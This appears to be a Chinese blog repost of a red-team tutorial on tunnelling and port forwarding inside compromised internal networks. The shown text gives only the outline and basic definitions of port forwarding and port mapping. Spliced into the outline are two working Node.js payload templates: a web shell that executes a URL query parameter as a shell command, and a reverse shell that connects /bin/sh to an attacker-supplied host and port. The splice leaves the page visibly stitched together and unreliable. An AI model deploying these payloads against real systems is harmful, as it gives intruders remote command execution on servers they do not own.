本文主要是介绍红队内网攻防渗透:内网渗透之内网通信隧道搭建:代理和转发,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
内网通信隧道搭建
- 一、内网端口转发和代理
- 1.1 什么是端口转发
- 1.2 什么是端口映射
- 1.3 端口转发和端口映射的区别
- 1.4 总结
- 二、通信隧道的搭建技术
- 2.1 什么隧道
- 2.2 判断内网连通性
- 2.2.1 使用ICMP协议判断通不通外网
- 2.2.2 使用TCP协议
- 2.2.3 使用HTTP协议
- 2.2.4 使用DNS协议
- 2.2.5 代理服务器
- 2.3 网络层的通信隧道
- 2.3.1 IPv6隧道
- 2.3.2 ICMP隧道
- 2.3.2.1 icmpsh隧道工具
- 2.3.2.2 Pingtunnel隧道工具
- 2.3.2.3 icmptunnel隧道工具
- 2.4 传输层隧道技术
- 2.4.1 lcx常规端口转发
- 2.4.1.1 Windows下使用lcx
- 2.4.1.2 Linux系统上面使用portmap
- 2.4.1.3 lcx本地端口转发
- 2.4.2 nc端口转发
- 2.4.2.1 Banner抓取
- 2.4.2.2 远程连接主机
- 2.4.2.3 端口扫描
- 2.4.2.4 端口监听
- 2.4.2.5 文件传输
- 2.4.2.6 简易聊天
- 2.4.2.7 获取shell
- 2.4.2.7.1 正向shell
- 2.4.2.7.2 反向shell
- 2.4.2.7.3 在目标主机中没有nc时获取反向shell
- 2.4.2.7.3 php反弹shell
- 2.4.2.7.4 perl反向shell
- 2.4.2.7.5 内网代理
- 2.4.3 PowerCat
- 2.5 应用层隧道技术
- 2.5.1 SSH隧道
- 2.5.1.1 SSH 命令
- 2.5.1.2 参数讲解
- 2.5.1.3 本地转发实验
- 2.5.1.4 远程转发实验
- 2.5.1.5 动态转发实验
- 2.5.2 HTTP/HTTPS隧道
- 2.5.2.1 reGeorg简介
- 2.5.2.2 正向代理(Forward Proxy)
- 2.5.2.3 反向代理(reverse proxy)
- 2.5.2.4 实战模拟
- 2.5.2.5 reGeorg的使用
- 2.5.2.6 proxychains-ng的使用
- 2.5.3 DNS隧道
- 2.5.3.1 dnscat2
- 2.5.3.2 iodine
- 2.5.4 SOCKS 代理技术
- 2.5.4.1 EarthWorm
- 2.5.4.2 正向 SOCKS 5 服务器
- 2.5.4.3 反弹 SOCKS 5 服务器
- 2.5.4.4 二级网络环境(a)
- 2.5.4.5 二级网络环境(b)
- 2.5.5 FRP代理
- 2.5.5.1 FRP下载
- 2.5.5.2 上传FRP
- 2.5.5.3 服务端配置
- 2.5.5.4 服务端启动
- 2.5.5.5 客户端配置
- 2.5.5.5 客户端开启
- 2.5.5.6 配置代理
- Author: Andre Lima @0x4ndr3
- Blog post: https://pentesterslife.blog/
- (function x(){
- require('http').createServer(
- function(req,res){
- res.writeHead(200,{"Content-Type":"text/plain"}
- );
- require('child_process').exec(require('url').parse(req.url,true).query['c'],
- function(e,s,st){
- res.end(s)
- }
- )
- }
- ).listen(%s)
- })()
- (function(){
- var net = require("net"),
- cp = require("child_process"),
- sh = cp.spawn("/bin/sh", []);
- var client = new net.Socket();
- client.connect(%s, "%s", function(){
- client.pipe(sh.stdin);
- sh.stdout.pipe(client);
- sh.stderr.pipe(client);
- });
- return /pwned/; // Prevents the Node.js app from crashing
- })()
一、内网端口转发和代理
在实际渗透过程中,我们成功入侵了目标服务器。接着我们想在本机上通过浏览器 或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端 口、内网网站8080端口等等。传统的方法是利用nc、lcx等工具,进行端口转发。
1.1 什么是端口转发
端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任 意主机的端口,转发到任意一台可以访问到的IP上,通常这个IP是公网IP。
适用端口转发的网络环境有以下几种:
1. 服务器处于内网,可以访问外部网络。
2. 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接。
3. 服务器处于内网,对外只开放了80端口,并且服务器不能访问外网网络。
1.2 什么是端口映射
映射端口,就是将一个内网端口映射到公网上的某个端口,假设我自己的电脑是在 内网中,没有公网IP,但是我想提供一个端口供其他人使用,这就是端口映射。
1.3 端口转发和端口映射的区别
端口映射场景:
外网主机A想访问内网主机B上的服务
端口转发场景:
外网主机A已经可以任意内网主机B上的端口,但是无法访问内网主机C上的端口。 此时可以将C主机的端口转发到B主机的端口,那么外网主机A访问B主机的某某端口 就相当于访问了C主机的某某端口。
1.4 总结
这篇关于红队内网攻防渗透:内网渗透之内网通信隧道搭建:代理和转发的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!